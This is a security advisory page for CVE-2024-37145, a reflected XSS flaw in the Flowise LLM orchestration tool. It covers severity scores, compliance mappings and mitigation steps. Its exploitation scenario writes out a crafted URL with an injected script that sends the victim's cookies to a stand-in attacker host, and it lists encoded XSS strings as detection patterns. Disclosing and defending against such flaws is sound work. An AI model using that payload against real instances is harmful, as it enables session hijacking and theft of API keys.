CVE-2024-37145: Flowise: reflected XSS enables file read chain via chatflow

MEDIUM PoC AVAILABLE
Published July 1, 2024
CISO Take

Flowise 1.4.3 contains a reflected XSS in the unauthenticated `/api/v1/chatflows-streaming/id` endpoint — when a chatflow ID is not found, its value is echoed unsanitized into a text/html 404 response, allowing an attacker to deliver a crafted URL that executes arbitrary JavaScript in any user's browser. Because Flowise ships with no authentication by default, this is a zero-credential network attack against any internet-exposed instance, and a public PoC already exists. More critically, this XSS chains with a path injection flaw to enable arbitrary file reads from the Flowise server, potentially exposing LLM API keys, database credentials, and system prompts stored in environment files. With 16 CVEs now catalogued against Flowise and no patch available at time of CVE publication, organizations should immediately enable authentication, restrict network access to trusted hosts, and rotate any secrets accessible from the server filesystem.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Despite a CVSS 6.1 Medium score — reduced by the required user interaction — the effective risk is elevated for several compounding reasons: a working PoC is publicly available; the default no-authentication configuration maximizes exposed attack surface; and the XSS-to-path-injection chain escalates impact well beyond typical reflected XSS into server-side credential exfiltration. Flowise is widely deployed as an LLM orchestration layer with privileged access to AI service API keys and internal data sources. The pattern of 16 cumulative CVEs in this package indicates systemic security debt and increases confidence that additional unpatched paths exist.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Flowise npm No patch

Do you use Flowise? You're affected.

How severe is it?

CVSS 3.1
6.1 / 10
EPSS
0.5%
chance of exploitation in 30 days
Higher than 37% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C Low
I Low
A None

What should I do?

6 steps
  1. Enable authentication immediately — set FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables; this single control eliminates the unauthenticated attack surface.

  2. Restrict network exposure — place Flowise behind a VPN or reverse proxy with IP allowlisting; do not expose the admin UI to the public internet.

  3. Upgrade — verify the installed version and apply any patch released after July 2024 via the FlowiseAI GitHub releases page.

  4. Rotate secrets — assume any API keys, credentials, or secrets accessible from the server filesystem are compromised on any previously public-facing instance.

  5. Detect — monitor web access logs for requests to /api/v1/chatflows-streaming/ containing script tags, javascript: URIs, or URL-encoded equivalents (%3Cscript, %6A%61%76%61%73%63%72%69%70%74).

  6. Reference GHSL-2023-232 and GHSL-2023-234 from GitHub Security Lab for the full technical disclosure of the attack chain.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.3 - AI system security testing
NIST AI RMF
MANAGE-2.2 - Mechanisms to achieve AI risk goals are planned and organizational responsibilities are assigned
OWASP LLM Top 10
LLM05 - Improper Output Handling

Frequently Asked Questions

What is CVE-2024-37145?

Flowise 1.4.3 contains a reflected XSS in the unauthenticated `/api/v1/chatflows-streaming/id` endpoint — when a chatflow ID is not found, its value is echoed unsanitized into a text/html 404 response, allowing an attacker to deliver a crafted URL that executes arbitrary JavaScript in any user's browser. Because Flowise ships with no authentication by default, this is a zero-credential network attack against any internet-exposed instance, and a public PoC already exists. More critically, this XSS chains with a path injection flaw to enable arbitrary file reads from the Flowise server, potentially exposing LLM API keys, database credentials, and system prompts stored in environment files. With 16 CVEs now catalogued against Flowise and no patch available at time of CVE publication, organizations should immediately enable authentication, restrict network access to trusted hosts, and rotate any secrets accessible from the server filesystem.

Is CVE-2024-37145 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-37145, increasing the risk of exploitation.

How to fix CVE-2024-37145?

1. Enable authentication immediately — set FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables; this single control eliminates the unauthenticated attack surface. 2. Restrict network exposure — place Flowise behind a VPN or reverse proxy with IP allowlisting; do not expose the admin UI to the public internet. 3. Upgrade — verify the installed version and apply any patch released after July 2024 via the FlowiseAI GitHub releases page. 4. Rotate secrets — assume any API keys, credentials, or secrets accessible from the server filesystem are compromised on any previously public-facing instance. 5. Detect — monitor web access logs for requests to /api/v1/chatflows-streaming/ containing script tags, javascript: URIs, or URL-encoded equivalents (%3Cscript, %6A%61%76%61%73%63%72%69%70%74). 6. Reference GHSL-2023-232 and GHSL-2023-234 from GitHub Security Lab for the full technical disclosure of the attack chain.

What systems are affected by CVE-2024-37145?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM orchestration platforms, no-code AI builders.

What is the CVSS score for CVE-2024-37145?

CVE-2024-37145 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.46%.

What is the AI security impact?

Affected AI Architectures

agent frameworksLLM orchestration platformsno-code AI builders

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0055 Unsecured Credentials
AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.3
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/chatflows-streaming/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.

Exploitation Scenario

An attacker identifies a publicly accessible Flowise instance — trivial via Shodan or Censys since Flowise runs on a distinctive default port. They craft a URL to `/api/v1/chatflows-streaming/<script>fetch('https://attacker.com/c?d='+btoa(document.cookie))</script>` and deliver it via phishing email or Slack message to a Flowise user or admin. When the victim clicks the link, Flowise reflects the chatflow ID raw into a text/html 404 response, executing the injected script in the victim's browser context. The attacker captures session tokens or admin credentials. In a second stage, the attacker leverages the path injection chain to issue a request reading the server's .env file, extracting OpenAI and Anthropic API keys along with any database credentials — pivoting to the organization's full AI stack without any further authentication.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Timeline

Published
July 1, 2024
Last Modified
November 21, 2024
First Seen
July 1, 2024

Related Vulnerabilities